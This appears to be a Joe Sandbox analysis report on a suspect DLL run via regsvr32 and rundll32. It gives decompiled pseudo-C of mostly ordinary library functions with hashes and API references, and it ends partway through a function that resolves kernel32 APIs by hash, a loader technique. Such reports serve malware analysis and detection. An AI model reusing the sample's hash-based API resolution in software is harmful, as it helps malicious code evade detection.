GetDesktopWindow.USER32 ref: 100308FC
LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
ReleaseDC.USER32 ref: 10030924

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100128A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100128A7(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x1004c470; // 0xf256d946
				_v8 = _t42;
				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x10050ba0) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x10050ba0) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x10050a68);
					_push( *0x10050b84);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E1001843D(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x10050ba0)) = 0;
							} else {
								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x10050ba0)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E100117AE(_t45, _v8);
			}

0x100128a7
0x100128a7
0x100128b0
0x100128b5
0x100128d1
0x100129e4
0x100129e4
0x100129e6
0x100129e6
0x100129e9
0x10012a04
0x10012a04
0x10012a07
0x10012a1c
0x10012a1c
0x10012a09
0x10012a09
0x10012a0c
0x00000000
0x10012a0e
0x10012a0e
0x10012a17
0x00000000
0x10012a17
0x10012a0c
0x100129eb
0x100129eb
0x100129ee
0x00000000
0x100129f0
0x100129f0
0x100129f9
0x100129f9
0x100129fc
0x100129fc
0x100129fc
0x100129ee
0x10012a23
0x10012a24
0x10012a24
0x100128d7
0x100128d7
0x100128d9
0x100128d9
0x100128e0
0x100128e1
0x100128e5
0x100128ea
0x100128f1
0x100128f3
0x100128f4
0x100128f7
0x100128f8
0x100128f8
0x100128fb
0x10012900
0x10012904
0x10012907
0x1001290a
0x1001291d
0x1001291d
0x1001291d
0x1001291d
0x1001291f
0x10012920
0x10012922
0x10012923
0x10012923
0x10012927
0x10012928
0x10012928
0x10012929
0x1001292b
0x10012937
0x1001293d
0x1001293e
0x10012945
0x10012946
0x10012948
0x1001294d
0x1001294f
0x1001295b
0x1001295c
0x1001295d
0x10012964
0x10012965
0x10012966
0x1001296c
0x10012971
0x10012973
0x1001297f
0x10012980
0x10012981
0x10012988
0x10012989
0x1001298e
0x10012994
0x1001299c
0x1001299e
0x1001299e
0x100129a9
0x100129c1
0x100129c4
0x100129d6
0x100129c6
0x100129c6
0x100129cd
0x00000000
0x100129cd
0x100129ab
0x100129ab
0x100129b2
0x100129b9
0x100129b9
0x100129b9
0x100129dd
0x100129de
0x100129e2
0x10012a32

APIs

GetCPInfo.KERNEL32(?,?), ref: 100128C3

Strings

, xrefs: 10012911
, xrefs: 100128EA

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791

Uniqueness

Uniqueness Score: -1.00%

Function 10021810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebx;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				void* _t38;
				struct HINSTANCE__* _t41;
				CHAR* _t43;

				_t38 = __ecx;
				_t43 = E100373A5() + 0x7c;
				_t25 = E100373B5();
				_t37 = _a8;
				_t41 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37) {
					L4:
					_push(_a16);
					_push(_a12);
					_push(_t37);
					_push(_a4);
					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
					goto L5;
				} else {
					_t49 = _a16 - _t37;
					if(_a16 != _t37) {
						goto L4;
					}
					_push(_a4);
					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
					L5:
					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
						_v44.style = _a4;
						_v44.lpfnWndProc = DefWindowProcA;
						_v44.cbWndExtra = 0;
						_v44.cbClsExtra = 0;
						_v44.lpszMenuName = 0;
						_v44.hIcon = _a16;
						_t40 = _a12;
						_push( &_v44);
						_v44.hInstance = _t41;
						_v44.hCursor = _t37;
						_v44.hbrBackground = _a12;
						_v44.lpszClassName = _t43;
						if(E10020B9B() == 0) {
							E10028C0C(_t40);
						}
					}
					return _t43;
				}
			}

0x10021810
0x10021820
0x10021823
0x10021828
0x1002182d
0x10021830
0x10021850
0x10021850
0x10021853
0x10021856
0x10021857
0x10021861
0x00000000
0x10021837
0x10021837
0x1002183a
0x00000000
0x00000000
0x1002183c
0x10021846
0x10021869
0x10021877
0x1002187f
0x10021887
0x1002188c
0x1002188f
0x10021892
0x10021895
0x10021898
0x1002189e
0x1002189f
0x100218a2
0x100218a5
0x100218a8
0x100218b2
0x100218b4
0x100218b4
0x100218b2
0x100218bf
0x100218bf

APIs

GetClassInfoA.USER32 ref: 1002186F

Strings

Afx:%p:%x, xrefs: 10021840
Afx:%p:%x:%p:%p:%p, xrefs: 1002185B

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClassInfo
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 3534257612-2801496823
Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100165C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100165C9() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x10050cac; // 0x1
				if(_t45 == 0) {
					E10012D82();
				}
				 *0x1004f6fc = 0;
				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
				_t10 =  *0x10050cb0; // 0x2d232f0
				 *0x1004f410 = 0x1004f5f8;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1004f5f8;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E100107B6(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1004f3f4 = _v8 - 1;
					 *0x1004f3f8 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}

0x100165cd
0x100165d3
0x100165d9
0x100165db
0x100165db
0x100165ec
0x100165f3
0x100165f9
0x10016600
0x10016606
0x1001660f
0x1001660f
0x10016608
0x1001660b
0x1001660d
0x00000000
0x00000000
0x1001660d
0x1001661d
0x10016628
0x1001662e
0x10016633
0x1001663a
0x1001664e
0x10016658
0x1001665e
0x10016664
0x1001663c
0x1001663c
0x1001663c
0x1001666a

APIs

___initmbctable.LIBCMT ref: 100165DB
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 100165E5, 100165EA

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FileModuleName___initmbctable
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 767393020-3922119987
Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10024C8E Relevance: 5.1, APIs: 4, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* __ebp;
				intOrPtr _t39;
				int _t40;
				void* _t50;
				char* _t51;
				intOrPtr _t52;
				char* _t61;
				signed int _t62;
				CHAR* _t64;
				signed int _t73;
				void* _t74;
				CHAR* _t82;
				intOrPtr _t85;
				intOrPtr _t87;

				_t39 =  *0x1004c470; // 0xf256d946
				_v8 = _t39;
				_v272 = __ecx;
				if(_a12 == 0) {
					L10:
					_t40 = 0;
					__eflags = 0;
					L11:
					return E100117AE(_t40, _v8);
				}
				_t73 = _a8 << 2;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
				if(_t85 == 0) {
					goto L10;
				}
				_t77 = _a4;
				_t82 = E100017D0(_a4, _t85 + 1);
				if(_t82 == 0) {
					E1001CE3B(_t77);
				}
				_t74 = lstrcpynA;
				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
				_t50 = E10038481(_t82, 0, 0);
				_t51 = _a16;
				_t87 = _t85 - _t50 + 1;
				_v276 = _t87;
				if(_t87 != _t51) {
					L7:
					_t52 = _v272;
					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
						_a12 = _t87 + _t82;
						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
						__eflags = 0x104;
						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
					}
					goto L9;
				} else {
					_t61 = _t51 + _t82;
					_a11 =  *((intOrPtr*)(_t87 + _t82));
					_a16 = _t61;
					 *_t61 = 0;
					_t62 = lstrcmpiA(_a12, _t82);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					_a12 = _t64;
					 *((char*)(_t87 + _t82)) = _a11;
					if(_t64 == 0) {
						goto L7;
					}
					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
					lstrcpynA(_t82,  &_v268, 0x104);
					L9:
					E10006CE2(_t74, _a4, _t82, 0xffffffff);
					_t40 = 1;
					goto L11;
				}
			}

0x10024c9b
0x10024ca1
0x10024ca5
0x10024cab
0x10024db7
0x10024db7
0x10024db7
0x10024db9
0x10024dc4
0x10024dc4
0x10024cb7
0x10024cbd
0x10024cc2
0x00000000
0x00000000
0x10024cc8
0x10024cd5
0x10024cd9
0x10024cdb
0x10024cdb
0x10024cf0
0x10024cf7
0x10024cfe
0x10024d05
0x10024d08
0x10024d0b
0x10024d11
0x10024d5d
0x10024d5d
0x10024d63
0x10024d67
0x10024d7a
0x10024d7d
0x10024d82
0x10024d93
0x10024da2
0x10024da2
0x00000000
0x10024d13
0x10024d1a
0x10024d1c
0x10024d1f
0x10024d22
0x10024d25
0x10024d2d
0x10024d2f
0x10024d30
0x10024d36
0x10024d39
0x00000000
0x00000000
0x10024d4b
0x10024d59
0x10024da7
0x10024dac
0x10024db3
0x00000000
0x10024db4

APIs

lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59

Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C

lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93

Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
String ID:
API String ID: 1551867014-0
Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10013EDE Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10013EDE() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x10050a48; // 0x0
				_t26 =  *0x10050a58; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x10050a4c; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x10050a48 =  *0x10050a48 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x10050a58 =  *0x10050a58 + 0x10;
						 *0x10050a4c = _t24;
						_t15 =  *0x10050a48; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x10013ede
0x10013ee3
0x10013eee
0x10013f24
0x10013f24
0x10013f3b
0x10013f3e
0x10013f46
0x10013f49
0x10013f5c
0x10013f64
0x10013f67
0x10013f7b
0x10013f7f
0x10013f81
0x10013f84
0x10013f8d
0x10013f90
0x10013f69
0x10013f73
0x00000000
0x10013f73
0x10013f4b
0x10013f4b
0x10013f4b
0x10013f4b
0x10013f94
0x10013ef0
0x10013ef0
0x10013f05
0x10013f0d
0x10013f13
0x10013f1a
0x10013f1f
0x00000000
0x10013f0f
0x10013f12
0x10013f12
0x10013f0d

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
HeapFree.KERNEL32(00000000,?), ref: 10013F73

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01

Uniqueness

Uniqueness Score: -1.00%

Function 10037A1B Relevance: 5.0, APIs: 4, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10037A1B(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1004f350 == 0) {
					E100379F7();
				}
				_t21 = _a4;
				_t24 = 0x1004f158 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x1004f19c);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x1004f19c);
				}
				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}

0x10037a22
0x10037a24
0x10037a24
0x10037a32
0x10037a36
0x10037a40
0x10037a49
0x10037a4e
0x10037a5b
0x10037a61
0x10037a61
0x10037a64
0x10037a6a
0x10037a6e
0x10037a76
0x10037a7b

APIs

EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76

Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 6408, Parent PID: 6388COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1001
Total number of Limit Nodes:	28

Executed Functions

Function 10006120 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 301
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
				void* _v4;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				struct HRSRC__* _t65;
				signed int _t68;
				signed int _t69;
				void* _t77;
				void* _t79;
				intOrPtr _t83;
				signed int _t85;
				signed int _t96;
				void* _t97;
				signed int _t99;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				long _t117;
				signed int _t119;
				void* _t121;
				struct HRSRC__* _t123;
				int _t124;
				void* _t127;
				struct HINSTANCE__* _t128;
				signed int _t129;
				void* _t133;
				signed int _t138;
				signed int _t149;
				signed int _t152;
				signed int _t157;
				intOrPtr _t182;

				if(_a8 != 1) {
					L6:
					return 1;
				} else {
					_t36 = E10005040(__edi);
					_t181 = _t36;
					if(_t36 != 0) {
						_push(0x1003ce28);
						E10011135(__ebx, __edi, __esi, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_push(L"kernel32.dll");
						_push(0x3801a8f2);
						_push(0x1a322e2e);
						_push(0x628ad09);
						_push(0x31c6c0a1);
